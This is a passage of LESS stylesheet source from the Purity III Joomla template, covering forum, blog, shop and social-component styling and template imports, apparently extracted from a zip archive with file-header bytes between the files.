  .table > tbody > tr > td,
  .table > tfoot > tr > td {
    padding: 15px;
  }

  .well {
    background: transparent;
    border: 1px solid @t3-border-color;
    box-shadow: none;
  }

  .topictitle {
    color: @gray-darker;
    font-weight: 500;
    font-size: @t3-font-size-bigger;

    &:hover,&:focus,&:active {
      color: @brand-primary;
    }
  }

  .started {
    color: @gray-light;
    font-size: 13px;
    margin-top: @t3-global-margin / 6;
  }

  .container-fluid .col-md-9 {
    padding-right: 0;
  }

  .modal {
    position: fixed;
  }

  // Table Style
  .table {
    border: 1px solid @t3-border-color;
    float: none;

    // Avatar
    .col-md-2 .col-md-3,
    .col-md-3 .col-md-3 {
      padding-right: 10px;
    }
    .kavatar {
      background: @white;
      border: 1px solid @t3-border-color;
      display: block;
      padding: 3px;
    }
    
    thead {
      background: @gray-dark;
      color: @white;
      font-size: @font-size-base;

      .well {
        color: @gray-dark;
      }

      tr td {
        border: 0;
        + td {
          border-left: 1px solid rgba(255,255,255,0.2);
        }
      }
    }

    tr td {
      border: 1px solid @t3-border-color;
      float: none!important;

      &.col-md-5 {
        .make-md-column(4);
      }

      &.col-md-2 + .col-md-2 {
        .make-md-column(3);
      }
    }

    td.hidden-xs {
      > a {
        color: @gray-light;

        &:hover,&:focus,&:active {
          color: @link-hover-color;
        }
      }
    }
  }

  tbody {
    .col-md-2,
    .col-md-3 {
      color: @gray;
      font-size: 13px;
    }
  }

  // Button
  .btn {
    font-size: 12px;
    padding: @t3-global-padding / 3 @t3-global-padding / 2;
    margin-top: 0;
    line-height: 1;

    .caret {
      border-top-color: @white;
    }
  }

  .btn-default {
    background: @white;
    border: 1px solid @t3-border-color;
    color: @gray;

    .caret {
      border-top-color: @gray;
    }

    &:hover,&:focus,&:active {
      background: @gray-lightest;
    }
  }

  .btn-group + .btn-group {
    margin-left: @t3-global-margin / 4;
  }

  #btn_report {
    background: @white;
    border: 1px solid @t3-border-color;
    color: @gray;
    padding: 4px 10px;

    .fa {
      color: @brand-warning;
    }

    &:hover,&:focus,&:active {
      border-color: @brand-warning;
    }
  }



  // Style Detail
  .kfrontend {
    padding-top: 0;
    margin-bottom: @t3-global-margin;
    padding-bottom: 0;
    .clearfix();

    & > .btn-toolbar {
      .btn.fa {
        background: transparent;
        border: 1px solid @gray-light;
        color: @gray-light;
        height: 28px;
        line-height: 22px;
        padding: 0;
        margin: 8px 12px 0 0;
        visibility: visible;
        text-align: center;
        width: 28px;
        opacity: 0.2;

        &:before {
          font-size: 24px;
        }

        &:hover {
          opacity: 0.5;

          &:before {
            color: @white;
          }
        }
      }
    }

    h1,
    h2.btn-link {
      background-color: @gray-dark;
      font-size: @font-size-base + 3;
      font-weight: 500;
      padding: (@t3-global-padding / 2) @t3-global-padding;
      margin: 0;

      a {
        color: @white;

        &:hover, &:focus, &:active {
          border-bottom: 0;
          text-decoration: none;
        }
      }

      &:hover {
        text-decoration: none;
      }
    }

    .row-fluid {
      margin-left: 0;
      margin-right: 0;
    }

    .section {
      margin-bottom: 0;
      .clearfix();

      table {
        border: 1px solid @t3-border-color;

        th, td {
          border: 1px solid @t3-border-color;
           padding: (@t3-global-padding / 2) @t3-global-padding;
        }

        tr {
          background-color: @gray-lightest;
        }

        tr.category {
          background-color: @white;
          .col-md-1 {
            width: 8%;

            a {
              display: block;
              color: @gray-light;

              &:hover, &:focus, &:active {
                color: @link-hover-color;
              }
            }
          }

          .col-md-8 {
            @media (min-width: @screen-md-min) {
              width: 35%;
            }
          }

          .col-md-3 {
            vertical-align: middle;

            .col-md-12 {
              padding: 0;

              div {
                padding: 0;
              }

              .col-md-4 {
                padding-right: 10px;
                margin-top: 5px;
                width: 40px;
              }

              .col-md-8 {
                @media (min-width: @screen-md-min) {
                  width: auto;
                  max-width: 80%;
                }
              }
            }
          }

          &:nth-child(2n+1) {
            background-color: @gray-lightest;
          }
        }

        .well {
          background-color: transparent;
          box-shadow: none;
          border: 0;
          padding: 0;
        }

        .header-desc {
          margin-top: @t3-global-margin / 2;
          margin-bottom: @t3-global-margin / 2;
        }

        ul.list-inline {
          border-top: 1px solid @t3-border-color;
          padding-top: @t3-global-padding / 2;
          li {
            margin-bottom: 5px;

            a {
              color: @text-color;

              i {
                color: @gray-light;
              }

              &:hover, &:focus, &:active {
                color: @link-hover-color;

                i {
                  color: @link-hover-color;
                }
              }
            }

            i {
              margin-right: 5px;
            }
          }
        }
      }
    }

    // Who is online
    #kwho,
    #kstats {
      .well {
        background-color: @white;
        margin-bottom: 0;
        padding: @t3-global-padding 0 0;

        i {
          margin-top: 0;
        }

        .btn-link {
          color: @gray-light;
          text-align: left;
        }
      }
    }

    #kwho {
      .list-unstyled {
        span {
          + span {
            margin-left: @t3-global-margin / 3;
          }
        }
      }
    }
  }

  // Form Search
  .form-search {
    .btn {
      padding: 0 @t3-global-padding;
      top: 0;
      height: 36px;
    }

    .search {
      height: 36px;

      input {
        border-color: @input-border;
        height: 36px;
        top: 0;
        padding: 0 10px;
        left: -11px;
        
        &:focus {
          border-color: @brand-primary;
          box-shadow: none;
        }
      }
    }
  }

  // Page Search
  #search {
    .well {
      padding-top: 0;
    }

    > .text-center {
      margin-bottom: @grid-gutter-width;
    }

    #categorylist {
      margin-bottom: @t3-global-margin / 2;
    }

    .row {
      margin: 0;

      > .col-md-6 {
        border: 1px solid @t3-border-color;
        padding: @t3-global-padding / 2;
        margin-top: @t3-global-margin;
        
        
        @media (min-width: @screen-md-min) {
          margin-right: @t3-global-margin;
          width: 46%;
        }

        fieldset {
          border: 0;
          padding: 0;
          margin: 0;
        }

        select {
          width: 100%;

          + select {
            margin-top: @t3-global-margin / 2;
          }
        }

        legend {
          margin-bottom: 4px;
          font-size: @font-size-base;
          padding: 0 10px;
        }
      }
    }
  }

  // New Topic
  #postform {
    .column-item {
      fieldset {
        border: 0;
        padding: 0;

        .form-group {
          @media (min-width: @screen-md-min) {
            margin-left: 0;
            margin-right: 0;
          }

          // Tablet/Mobile view
          @media (max-width: @screen-sm-max) {
            margin-bottom: @t3-global-margin / 2;

            label {
              margin-bottom: @t3-global-margin / 4;
              width: 100%;
            }

            #postcatid {
              margin-left: 0;
            }
          }
        }

        .controls {
          margin-left: 107px;

          // Tablet/Mobile view
          @media (max-width: @screen-sm-max) {
            padding-left: @grid-gutter-width / 2;
            padding-right: @grid-gutter-width / 2;
            margin-left: 0;
          }
        }

        #iconset_topic_list {
          .clearfix();

          input[type="radio"] + label {
            border: 1px solid @t3-border-color;
            border-radius: 3px;
            color: @gray-light;
            padding: 0;
            margin: 0 @t3-global-margin / 2 @t3-global-margin / 2 0;
            line-height: 40px;
            text-align: center;
            height: 40px;
            width: 40px;

            .fa {
              font-size: 18px;
            }
          }

          input[type="radio"]:checked + label {
            background: transparent;
            border: 1px solid @brand-primary;
            color: @brand-primary;
            padding: 0;
          }
        }

        // Editor
        #tabs_kunena_editor {
          border: 0;
          margin-bottom: @t3-global-margin / 2;

          li {
            margin-right: @t3-global-margin / 2;

            a {
              border: 1px solid @t3-border-color;
              color: @gray-dark;
              padding: @t3-global-padding / 4 @t3-global-padding / 2;
              line-height: 1;
            }

            &.active {
              a {
                background: @brand-primary;
                border: 1px solid @brand-primary;
                color: @white;
              }
            }
          }
        }

        .markItUp {
          .markItUpHeader {
            background: @gray-lightest;
            border: 1px solid @t3-border-color;
            padding: @t3-global-padding / 2;
            height: auto;
            margin-bottom: -1px;

            ul {
              .clearfix();
            }
          }

          .markItUpEditor {
            padding: @t3-global-padding / 2;

            &:focus {
              box-shadow: none;
            }
          }
        }
      }

      #kpost-attachments,
      #kpost-subscribe {
        @media (max-width: @screen-sm-max) {
          .control-label {
            display: block;
            float: none;
            text-align: left;
          }

          .controls {
            padding-left: 0;
          }

          .string {
            display: inline;
          }
        }
      }
    }

    > div > div > div > fieldset > div > div {
      margin: 0;

      &.modal-dialog {
        margin: @navbar-height * 2 auto;

        h3 {
          margin-top: 0;
        }
      }
    }

    > .center {
      margin-bottom: @t3-global-margin;
    }

    // Attach
    #kattach_form {
      .label-info {
        background: transparent;
        color: @gray-dark;
        display: block;
        font-weight: 400;
        padding: 0;
        text-align: left;
        margin-bottom: @t3-global-margin / 4;
        white-space: normal;
      }

      > br {
        display: none;
      }
    }
  }

  #files {
    margin-top: @t3-global-margin;
    .clearfix();

    > div {
      border: 1px dashed @t3-border-color;
      display: inline-block;
      padding: @t3-global-padding / 2;
      margin-right: @t3-global-margin / 4;
      margin-bottom: @t3-global-margin / 2;
      float: left;

      .btn {
        display: block;
        padding: 5px;
        font-size: 11px;
        margin-top: @t3-global-margin / 4;
        width: 100%;
      }

      .alert-error {
        background: transparent;
        border: 0;
        color: @brand-warning;
        padding: 0;
        margin-bottom: 0;
        margin-top: @t3-global-margin / 2;
        max-width: 150px;
      }
    }
  }

  #dropzone {
    .dropzone {
      .message {
        border: 2px dashed @t3-border-color;
        color: @gray-light;
        margin: 0;
        padding: @t3-global-padding;
        text-transform: uppercase;
      }
    }
  }

  // View announcement
  .view-announcement & {
    #adminForm {
      @media (max-width: @screen-sm-max) {
        overflow-x: scroll;
        margin-bottom: @t3-global-margin;
      }
    }
  }

  // Edit Profile
  #editavatar {
    overflow-x: scroll;
  }

  #KunenaUserEdit {
    margin-bottom: @t3-global-margin;
  }

  .tab-content {
    tfoot {
      .input-group-btn {
        text-align: right;

        select {
          float: none;
          margin-right: @t3-global-margin / 4!important;
        }
      }
    }
  }

  // View Topic
  .view-topic & {
    > h1 {
      font-size: @t3-font-size-bigger;

      .fa {
        font-size: @t3-font-size-bigger;
      }
    }

    // Topic detail
    .message {
      border: 1px solid @t3-border-color;
      
      > div {
        padding: @t3-global-padding 0;

        &.col-md-2 {
          border-right: 1px solid @t3-border-color;
        }

        &.col-md-10 {
          border-left: 1px solid @t3-border-color;
          margin-left: -1px;
          padding-left: @t3-global-padding;
          padding-right: @t3-global-padding;
        }
      }

      // Modal report
      .modal {
        z-index: 100000;

        .modal-header {
          h4 {
            margin-top: 0;
          }
        }
      }

      // Message
      .message-published {
        border: 0;
        box-shadow: none;
        padding: 0;
        min-height: 0;

        &::after {
          display: none;
        }

        .pull-right.text-muted {
          display: block;
          float: none!important;
          text-align: right;
          margin-top: @t3-global-margin / 2;
        }
      }

      .kmsg {
        font-family: @font-family-base;
        font-size: @font-size-base;
      }

      // File Attach
      .kattach {
        .thumbnails {
          padding: 0;
          margin: 0;
          .clearfix();

          li {
            width: auto;
          }

          .btn-default {
            border: 0;
            padding: 0;
          }
        }
      }

      // Profile
      .col-md-2 {
        padding-left: @t3-global-padding / 2;
        padding-right: @t3-global-padding / 2;

        .topic-starter {
          border: 0;
        }

        .profilebox {
          li {
            display: block;
            margin-bottom: @t3-global-margin / 3;
          }
        }

        .profile-expand {
          .btn-default {
            background: transparent;
            border: 1px solid @t3-border-color;
            color: @gray;
            font-size: 11px;
          }

          ul {
            li {
              margin-top: @t3-global-margin / 3;
            }
          }
        }
      }

      // Quick Reply
      .qreplyform {
        .panel-default {
          padding: @t3-global-padding;

          .panel-body {
            border: 0;
            padding-top: 0;

            .modal-header {
              padding: 0;

              h3 {
                margin-top: 0;
              }
            }
          }
        }

        .wysibb-toolbar {
          min-height: 34px;
        }
      }
    }
  }

  // View User
  .view-user & {
    h1 {
      margin-top: 0;
    }

    .container {
      background: @gray-lightest;
      clear: both;
      padding-bottom: @t3-global-padding;
      padding-top: @t3-global-padding;
    }

    // nav Tab
    .nav-tabs{
      border-bottom: 0;
      margin-bottom: @t3-global-margin;

      > li {
        margin-right: @t3-global-margin / 4;
        margin-bottom: @t3-global-margin / 6;

        a {
          border: 1px solid @t3-border-color;
          color: @gray;
          font-size: 11px;
          font-weight: 500;
          text-transform: uppercase;
          padding: @t3-global-padding / 4 @t3-global-padding / 2;

          &:hover,&:focus,&:active {
            border-color: @brand-primary;
            color: @brand-primary;
          }
        }

        &.active {
          a {
            background: @brand-primary;
            border-color: @brand-primary;
            color: @white;
          }
        }
      }
    }
  }

  // Share link
  .jssocials-share-link {
    box-shadow: none;
    font-size: @t3-font-size-smaller - 2;
    padding: 4px 6px;
  }

  // PATHWAY
  // -----------------------
  .breadcrumb {
    background-color: @gray-lightest;
    border: 1px solid @t3-border-color;
    padding: 10px (@t3-global-padding / 2);

    .divider {
      display: none;
    }
  }

  // PAGINATION
  // -----------------------
  ul.pagination {
    border: 1px solid @t3-border-color;
    margin: 0 0 @t3-global-margin;
    .clearfix();

    li {
      display: block;
      float: left;

      + li {
        border-left: 1px solid @t3-border-color;
      }

      a {
        border: 0;
        display: inline-block;
        float: none;
        font-size: @font-size-base;
        font-weight: @font-weight-normal;
        margin: -1px;
        padding: 5px 15px;

        &.disabled {
          .opacity(0.4);
        }
      }
    }
  }
}


// Module Kunena
input#ksearch-keywords {
  width: 100%;
}

.klatest {
  .klatest-items {
    li {
      border: 0;
    }

    .klatest-item {
      margin-top: @t3-global-margin / 2;

      .klatest-subject {
        padding-top: 0;
      }
    }
  }
}

div.kstats-module ul.kstats-items li {
  padding: @t3-global-padding / 2;
}

// USER LIST
// ------------------------------------
#kunena.layout {

  // User list
  // ---------
  #kuserlist-form {
    .label {
      border-radius: 3px;

      &.label-default,
      &.label-success,
      &.label-warning,
      &.label-error {
        color: @white;
      }
    }
  }

  // Anouncement
  // -----------
  #adminForm {
    table.table {
      margin-top: 20px;
    }
  }

  .input-group-btn {
    .btn {
      margin-left: 10px;
      min-height: 20px;
      line-height: 20px;
    }
  }

  #ann-date,
  #ann-date2,
  #ann-date3 {
    .input-group-addon {
      display: inline-block;
      height: 34px;
      line-height: 24px;
    }
  }
}

.com_kunena {
  .datepicker-dropdown {
    background: @white;
    border-color: darken(@gray-lighter, 10%);
    padding: 10px;
  }
}

.view-topic {

  body.modal-open {
    overflow: auto;
  }
}


// Update to compatible with Kunena 6.x
// ------------------------------------
.com_kunena {
  #t3-mainnav {
    padding: 0;

    .t3-navbar {
      display: inline-block;
      flex: 1;
    }
  }

  .t3-megamenu {
    .navbar-nav {
      flex-direction: row;

      .dropdown-menu {
        position: absolute;
      }

      .dropdown-toggle::after {
        display: none;
      }
    }
  }

  .tab-pane {
    &.show {
      opacity: 1;
    }
  }
}
PKԜ�\&`lG��(purity_iii/less/extras/com_easyblog.lessnu&1i�@import "../vars.less";

// ---------------------------------------------------------
// EASYDISCUSS COMPATIBLITY
// ---------------------------------------------------------

#eblog-wrapper {
  // Toolbar
  .btn-eb-navbar {
    height: 30px;
    width: 44px;
  }

  // Search blog
  #eblog-search .search-input input {
    height: 30px !important;
  }
}

.ezb-mod.mod_easyblogcategories {
  .mod-item {
    padding-top: 20px !important;
  }
}

div#fd.eb {
	.eb-post + .eb-post {
		border-top: 1px solid @t3-border-color;
		padding-top: @t3-global-padding*2;
	}
}

// Recent Blogs Module
.mod-es-recent-blogs {
  .es-nav-blogs {
    margin: 0;
    padding: 0;
    li {
      list-style-type: none;
      .media-object {
        margin-bottom: 20px;
      }
    }
  }
}

.t3-sidebar {
	#fd.mod-es-recent-blogs {
		.media {
			padding: 0 !important;
			
			.media-object {
				float: none !important;
				padding: 0;
				margin: 0 0 @t3-global-margin;
				
				img {
					max-width: 100%;
				}
			}
		}
	}
}

// Tag Blogs Module
.mod-easyblogtagcloud {
	.tag-cloud {
		margin: 0 10px 5px 0;
		display: inline-block;
		line-height: normal !important;
	}
}PKԜ�\d��%��(purity_iii/less/extras/com_mijoshop.lessnu&1i�
@import "vars.less"; // Modify this for custom colors, font-sizes, etc


// 
// COMPATIBLE WITH MIJOSHOP
// ---------------------------------------------------------
.com_mijoshop {
	
	// Product Detail
	// -------------------
	.common-home {
		#content_oc h1,
		#content_oc h2 {
			font-size: @font-size-h3;
		}
	}

  // All categories
  // --------------
  .box_oc {
    .box-product {
      margin-left: 0;
      padding: 20px;
      & > div {
        float: left;
        margin: 0;
				margin-right: 20px;
				width: 100%;
				
        .image {
          display: inline-block;
          border: 1px solid @t3-border-color;
          padding: 5px;
          text-align: left;

          a {
            display: inline-block;
          }

          img {
            border: 0;
            padding: 0;
          }
        }

        .name {
          padding: (@t3-global-padding / 2) 0;
          text-align: left;
        }
        .price {
          margin: 10px 0;
        }
      }
    }
		#tab-related {
			.box-product {
				& > div {
					width: auto;
				}
			}
		}
    .box-content {
      .content_oc {
        p {
          * {
            margin: 10px 10px 10px 0;
          }
        }
      }
    }
  }


	// Category page ( Product list )
	// ------------------------------

	// Header
	#header_oc {
    margin: 0 0 @t3-global-margin;
    padding: 0;

    #currency {
      top: 0;

      a {
        margin-top: 5px;
      }
    }

    #cart {
      border-left: 1px solid @t3-border-color;
      margin-left: @t3-global-margin;
      top: 5px;

      .heading {
        margin-top: 0;
      }
    }

    #search_oc {
      top: 10px;
      width: 120px;

      input[type="text"] {
        border-radius: 0;
        height: 25px;
        .box-sizing(border-box);
      }
    }

    .links {
      bottom: 0;
      top: auto;
    }
  }

  #currency,
  #top-links {
    .dropdown-menu > li {
      border-color: @t3-border-color;

      a:hover, a:focus {
        color: @white;
      }
    }

    .open a {
      color: @text-color
    }
  } 

  // Content
	// ---------------------
	
	.mijoshop {
		// Product Thumbnail
		.product-thumb {
		
			.image img {
					max-width: 100%;
					width: 100%;
			}
			
			.caption {
				padding: 15px !important;
				
				h4 {
					margin: 0 0 @t3-global-margin/2;
					font-size: @t3-font-size-big;
					
					a {
						color: @gray-dark;
						
						&:hover, &:focus {
							color: @brand-primary;
						}
					}
				}
				
				.price {
					font-weight: @font-weight-bold;
					color: @brand-primary;
					margin-top: @t3-global-margin/2 !important;
					
					.price-tax {
						color: @gray-light;
						font-weight: @font-weight-normal;
					}
				}
			}
		}
	}
	
	#content_oc {
    > h2 {
      margin-bottom: @t3-global-margin*1.5;
			font-size: @font-size-h3;
    }
		
		// Product compare
		> p {
			padding: @t3-global-padding/2 @t3-global-padding;
			border: 1px solid @t3-border-color;
      margin-bottom: @t3-global-margin !important;
      margin-top: @t3-global-margin / 2!important;
		}

    // Product filter
		.product-filter {
      padding-bottom: @t3-global-padding / 2;

      .display {
        padding-top: 15px;
      }  
    }
		
		// Product Grid
		.product-grid {
			.product-thumb {
				
				.caption {
					min-height: 200px !important;
				}
			}
		}
		
		// Product List
		.product-list {
			.product-thumb {
			
				.image {
					padding: 0 @t3-global-padding 0 0;
					height: 200px;
					
					> a {
						height: 100%;
					}
					
					img {
						max-width: 100%;
						max-height: 100%;
					}
				}
				
				.caption {
					overflow: hidden;
					margin: 0;
					padding: @t3-global-padding @t3-global-padding @t3-global-padding 0 !important;
					min-height: 161px !important;
				}
			}
		}
  }



  // Product detail
	// --------------
	.product-info {
    .left {
      width: 30% !important;
    }

    .right {
      min-height: 352px;
      width: 65% !important;

      .description {
        border-top: 0;
        padding: 0 0 (@t3-global-padding / 2);
      }

      .cart div {
        input[type="text"],
        input[type="button"] {
          display: inline-block;
        }

        input[type="text"] {
          padding-left: 5px;
          padding-right: 5px;
        }

        span {
          color: @gray-light;
        }
      }

    }
  }

  #tab-description,
  #tab-review {
    padding: @t3-global-padding;
  }


  // My Account page
	// ---------------
	.content_oc {
    ul {
      list-style: none;
      margin: 0;
      padding: 0;
    }
  }


  // Checkout page
	// -------------
	.cart-info {
    .quantity input[type='text'] {
      .box-sizing(content-box);
      height: 28px;
      padding-top: 0;
      padding-bottom: 0;
    }
  }

  .cart-module {
    #coupon input,
    #voucher input {
      display: inline-block;
    }

    #shipping table {
      border-bottom: 1px solid @t3-border-color;
      margin-bottom: @t3-global-margin;
    }

    #shipping table td {
      padding: (@t3-global-padding / 2) @t3-global-padding;
    }
  }


  // Mijoshop modules
	// ----------------
	.box-category {
    ul {
      li {
        padding: 10px 10px 10px 0;
      }
    }
  }

  // Mijoshop colorbox
	// ----------------
	#colorbox {
    box-sizing: unset !important;
  }
	
	// Sidebar
	// ---------------
	
	#column-right {
		
		.row > div {
			width: 100%;
			float: none;
		}
	}
	
	.t3-sidebar {
		.mijoshop .container_oc {
			.row > div {
				width: 100%;
				float: none;
			}
		}
	}
}PKԜ�\3\n���*purity_iii/less/extras/com_easysocial.lessnu&1i�@import "../vars.less";

// ---------------------------------------------------------
// EASYSOCIAL COMPATIBLITY
// ---------------------------------------------------------

.com_easysocial {

  .es-toolbar .es-navbar-search .search-query::-moz-placeholder {
    color: @white;
  }

  .stream-meta {
    margin-left: 0;
    margin-right: 0;

    .stream-title {
      .row-fluid {
        margin-left: 0;
        margin-right: 0;
      }
    }

    .stream-content {
      .row-fluid {
        margin-left: 0;
        margin-right: 0;
      }
    }

  }


  .es-stream-meta {
    .es-stream-title {
      .row-fluid {
        margin-left: 0;
        margin-right: 0;
      }
    }
  }

  .dropdown-menu > li {
    border: 0;
  }

  #es .app-news {
  	.checkbox input[type="checkbox"] {
  		position: relative;
  		margin-left: 0;
  	}
  }
}

#es .o-nav--block {
	white-space: normal;
}

.es {
  clear: both;
}PKԜ�\D1-�  purity_iii/less/template.lessnu&1i�/** 
 *------------------------------------------------------------------------------
 * @package       T3 Framework for Joomla!
 *------------------------------------------------------------------------------
 * @copyright     Copyright (C) 2004-2017 JoomlArt.com. All Rights Reserved.
 * @license       GNU General Public License version 2 or later; see LICENSE.txt
 * @authors       JoomlArt, JoomlaBamboo, (contribute to this project at github 
 *                & Google group to become co-author)
 * @Google group: https://groups.google.com/forum/#!forum/t3fw
 * @Link:         http://t3-framework.org 
 *------------------------------------------------------------------------------
 */


// VARIABLES & MIXINS
// ------------------
@import "vars.less"; // Modify this for custom colors, font-sizes, etc


// T3 GLOBAL STYLES
// ----------------

// Extend grid of bootstrap - removed
//@import "../../../plugins/system/t3/base-bs3/less/grid-ext.less";

// Extended functions for T3
@import "../../../plugins/system/t3/base-bs3/less/t3.less";


// TEMPLATE STYLE
// --------------

// Core Elements
@import "core.less";

// Typography
@import "typography.less";

// Form Elements
@import "forms.less";

// Navigation
@import "navigation.less";

@import "navbar.less";

// Modules
@import "modules.less";

// Joomla Styles
@import "joomla.less";

// Components Styles
@import "components.less";

// Template Styles
@import "style.less";

@import "components-addons.less";

// Joomla 4 compatible
@import "../../../plugins/system/t3/base-bs3/less/legacy_j4.less";PKԜ�\"%''''purity_iii/less/components.lessnu&1i�/** 
 *------------------------------------------------------------------------------
 * @package       T3 Framework for Joomla!
 *------------------------------------------------------------------------------
 * @copyright     Copyright (C) 2004-2017 JoomlArt.com. All Rights Reserved.
 * @license       GNU General Public License version 2 or later; see LICENSE.txt
 * @authors       JoomlArt, JoomlaBamboo, (contribute to this project at github 
 *                & Google group to become co-author)
 * @Google group: https://groups.google.com/forum/#!forum/t3fw
 * @Link:         http://t3-framework.org 
 *------------------------------------------------------------------------------
 */
 

// --------------------------------------------------
// BOOTSTRAP COMPONENTS STYLES
// --------------------------------------------------

//
// TITLES
// --------------------------------------------------

// Page header
// -----------
.page-header {
  padding-bottom: @t3-global-padding;
  margin: 0 0 @t3-global-margin;
  border-bottom: 1px solid @page-header-border-color;
}

.page-title,
.page-header h1 {
  line-height: 1;
  margin: 0;
}


// Page Subheader
// --------------
.page-subheader {
  border-bottom: 1px solid @t3-border-color;
  margin: 0 0 @t3-global-margin;
  padding-bottom: @t3-global-padding;
  .clearfix();
}

.page-subtitle,
.page-subheader h2 {
  line-height: 1;
  margin: 0;
}

.page-header + .page-subheader {
  margin-top: -@line-height-computed; //If there is page header, then omit the space before page subheader
}


// Article Header
// --------------
.article-title,
.article-header {
  h1, h2 {
    a {
      &:hover, &:active, &:focus {
        text-decoration: none;
      }
    }
  }
}

.article-title,
.article-header h1, {
  margin: 0 0 @line-height-computed 0;

  // Control screen mobile
  @media screen and (max-width: @screen-xs-max) {
    font-size: @font-size-h3;
  }
}

// Smaller "Article Title" in Blog and List layout
h2.article-title,
.article-header h2 {
  // Control screen mobile
  @media screen and (max-width: @screen-xs-max) {
    font-size: @font-size-h3;
  }
}


// Item Header
// -----------
.item-title {
  font-weight: bold;
}



//
// MASHEAD & JUMBOTRON
// --------------------------------------------------

// Jumbotron (jumbotron.less)
// --------------------------
.jumbotron {

  .clearfix();

  h1, h2, h3 {
    margin-top: 0;
  }

  p {
    color: @gray;
    // Remove margin on last paragraph
    &:last-child {
      margin-bottom: 0;
    }
  }

  .container & {
    border-radius: @border-radius-large; // Only round corners at higher resolutions if contained in a container
  }

  .btn {
    margin-top: @line-height-computed;
    margin-bottom: @line-height-computed;
  }

  @media screen and (min-width: @grid-float-breakpoint) {
    .container & {
    }
    h1 {
    }
  }

}


// Mashead
// --------
.masthead {
  padding-top: (@t3-global-padding * 2);
  padding-bottom: (@t3-global-padding * 2);
  text-align: center;

  p {
    // Remove margin on last paragraph
    &:last-child {
      margin-bottom: 0;
    }
  }

  @media screen and (min-width: @screen-md) {
    padding-top: (@t3-global-padding * 4);
    padding-bottom: (@t3-global-padding * 4);
    h1 {
      font-size: @font-size-h1 * 2;
    }
    p {
      font-size: @font-size-base * 2;
    }
    // Bigger mashead btn
    .btn-lg {
      padding: 15px 40px;
      font-size: @font-size-h3;
    }
  }

}


// T3 Jumbotron Primary
// --------------------
.jumbotron-primary {
  background-color: @brand-primary;
  h1, h2, h3 {
    color: @white;
  }
  p {
    color: lighten(@brand-primary, 50%);
  }
  .btn-primary {
    border-color: #fff;
  }
}


// Page Mashead
// ------------
.page-masthead {
  .clearfix();
  .jumbotron {
    margin-top: 0 !important;
    margin-bottom: 0 !important;
    padding-top: @t3-global-padding * 3;
    padding-bottom: @t3-global-padding * 3;
    padding-left: 0;
    padding-right: 0;
    // Smaller Padding on Mobile
    @media screen and (max-width: @screen-sm-max) {
      padding-top: @t3-global-padding * 2;
      padding-bottom: @t3-global-padding * 2;
    }

    // Control screen mobile
    @media screen and (max-width: @screen-xs-max) {
      padding-left: @t3-global-padding;
      .container {
        padding: 0;
      }
    }
  }
}



//
// LABELS & BADGES
// --------------------------------------------------

// Labels (labels.less)
// --------------------

.label {
  border-radius: @border-radius-base;
  // Add hover effects, but only for links
  &[href] {
    &:hover,
    &:focus {
    }
  }

  // Empty labels collapse automatically (not available in IE8)
  &:empty {
    display: none;
  }
}

// Colors
// Contextual variations (linked labels get darker on :hover)

.label-default {
}

.label-primary {
}

.label-success {
}

.label-info {
}

.label-warning {
}

.label-danger {
}


// Badges (badges.less)
// --------------------

// Base classes
.badge {

  // Empty badges collapse automatically (not available in IE8)
  &:empty {
    display: none;
  }
}

// Hover state, but only for links
a.badge {
  &:hover,
  &:focus {
  }
}

// Quick fix for labels/badges in buttons
.btn .badge {
  position: relative;
  top: -1px;
}

// Quick fix for labels/badges in page-header- NNTH
.page-header {
  .label, .badge {
    vertical-align: middle;
  }
}



//
// THUMBNAILS  (thumbnails.less)
// --------------------------------------------------

// Mixin and adjust the regular image class
.thumbnail {
  padding: 0;
  margin-bottom: @t3-global-margin * 2;
  > img {
  }
}

// Add a hover state for linked versions only
a.thumbnail:hover,
a.thumbnail:focus,
a.thumbnail.active {
}

// Image captions
.thumbnail .caption {
}



//
// ALERTS (alerts.less)
// --------------------------------------------------

// Base styles
// -------------------------
.alert {

  // Headings for larger alerts
  h4 {
    color: inherit;
  }

  // Provide class for links that match alerts
  .alert-link {
  }

}


// Dismissable alerts
// ------------------
.alert-dismissable {
}


// Alternate styles
// ---------------
.alert-success {
}

.alert-info {
}

.alert-warning {
}

.alert-danger {
}



//
// MEDIA OBJECTS (media.less)
// Source: http://stubbornella.org/content/?p=497
// --------------------------------------------------

// Common styles
// -------------------------
.media,
.media .media {
}

.media:first-child {
  margin-top: 0;
}

.media-object {
  display: block;
}

.media-heading {
  margin: 0 0 5px;
}


// Media image alignment
// -------------------------
.media {
  > .pull-left {
    margin-right: 10px;
  }
  > .pull-right {
    margin-left: 10px;
  }
}


// Media list variation
// -------------------------
.media-list {
}



//
// LIST GROUP (list-groups.less)
// --------------------------------------------------
// Base class
//
// Easily usable on <ul>, <ol>, or <div>.
.list-group {
  // No need to set list-style: none; since .list-group-item is block level
}


// Individual list items
// -------------------------
.list-group-item {

  // first and last items
  &:first-child {
  }
  &:last-child {
  }

  // Align badges within list items
  > .badge {
    float: right;
  }
  > .badge + .badge {
    margin-right: 5px;
  }
}

// Linked list items
a.list-group-item {

  .list-group-item-heading {
  }

  // Hover state
  &:hover,
  &:focus {
  }

  // Active class on item itself, not parent
  &.active,
  &.active:hover,
  &.active:focus {

    // Force color to inherit for custom content
    .list-group-item-heading {
      color: inherit;
    }
    .list-group-item-text {
      color: lighten(@list-group-active-bg, 40%);
    }
  }
}

// Custom content options
// -------------------------
.list-group-item-heading {
}

.list-group-item-text {
}



//
// PANELS (panels.less)
// --------------------------------------------------
// Base class
.panel {
}

// Panel contents
.panel-body {
}


// Optional heading
.panel-heading {
  > .dropdown .dropdown-toggle {
    color: inherit;
  }
}

// Within heading, strip any `h*` tag of it's default margins for spacing.
.panel-title {
  > a {
    color: inherit;
  }
}

// Optional footer (stays gray in every modifier class)
.panel-footer {
}


// Collapsable panels (aka, accordion)
.panel-group {

  .panel {
    + .panel {
    }
  }

  .panel-heading {
    + .panel-collapse .panel-body {
    }
  }

  .panel-footer {
    + .panel-collapse .panel-body {
    }
  }

}


// Contextual variations
.panel-default {
}

.panel-primary {
}

.panel-success {
}

.panel-warning {
}

.panel-danger {
}

.panel-info {
}



//
// WELLS (wells.less)
// --------------------------------------------------
// Base class
.well {
  blockquote,
  p {
  }
}

// Sizes
.well-lg {
}

.well-sm {
}



//
// MODALS (modals.less)
// --------------------------------------------------
// Container that the modal scrolls within
.modal {
}

// Shell div to position the modal with bottom padding
.modal-dialog {
}

// Actual modal
.modal-content {
}

// Modal background
.modal-backdrop {
  // Fade for backdrop
  &.fade { .opacity(0); }
  &.in { .opacity(.5); }
}

// Modal header
// Top section of the modal w/ title and dismiss
.modal-header {
  border-bottom: 0;
